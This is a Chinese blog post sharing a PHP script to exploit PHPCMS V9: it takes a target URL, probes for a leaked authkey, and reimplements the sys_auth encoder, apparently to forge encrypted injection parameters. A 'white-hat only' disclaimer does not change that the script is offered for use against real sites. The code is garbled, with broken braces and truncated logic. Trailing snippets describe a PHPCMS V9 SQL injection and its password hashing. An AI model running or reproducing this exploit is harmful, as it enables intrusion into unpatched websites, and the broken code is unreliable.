PHPCMS V9 注射利用

2021-07-09 17:29:05 字數 636 閱讀 7331

在用bugscan(白帽子神器)檢測朋友**的時候碰到這個authkey。

順便把利用**給大家分享下。

<?php 

//本指令碼僅供白帽子安全測試使用,如有用於非法途徑,與作者無關

//小白第一次寫東西,大牛勿噴

//獲取檢測網域名稱

$domain_url='';

$domain_url = $_post['url'];

echo "";

//判斷網域名稱是否為空,否則進行authkey洩漏檢測

if($domain_url != '')/';

preg_match($rule,$code,$m);

if($m)

}function sys_auth($string, $operation = 'encode', $key = '', $expiry = 0) ) ^ ord($keys));

}if($operation == 'encode') else else

}}?>

效果如圖

僅作交流,切勿用於非法途徑

教你如何利用phpcms v9

v9標籤迴圈巢狀呼叫資料 pc巢狀呼叫 rel noopener noreferrer 教你如何利用phpcms v9標籤迴圈巢狀呼叫資料 pc巢狀呼叫 王小安 很多人都不知道,在phpcms v9中可以利用標籤迴圈巢狀方法,可以實現對pc標籤迴圈呼叫。以下是實現對pc標籤迴圈呼叫的 在此檔案裡 很...

phpcmsV9某sql注射漏洞及修復

別人說最危險的地方最安全,我說最安全的地方最危險。相信你們也沒有想到這個最常見,常常會在各種教程出現的地方會存在sql注射。需 gpc off 首先,我們看登陸的地方。最常見了吧。預設安裝情況下,會使有 v9自帶的使用者中心。synloginstr 同步登陸js if pc base load co...

PHPCMS V9 加密規則

phpcms v9 加密規則 加密方式 md5 md5 password encrypt 第一步 對輸入的密碼32位小寫 md5 對輸入的密碼進行trim過濾 第三步 第二步結果密碼32位小寫 md5 例子 密碼 123456 encrypt vcmkn3 如下 a md5 123456 echo ...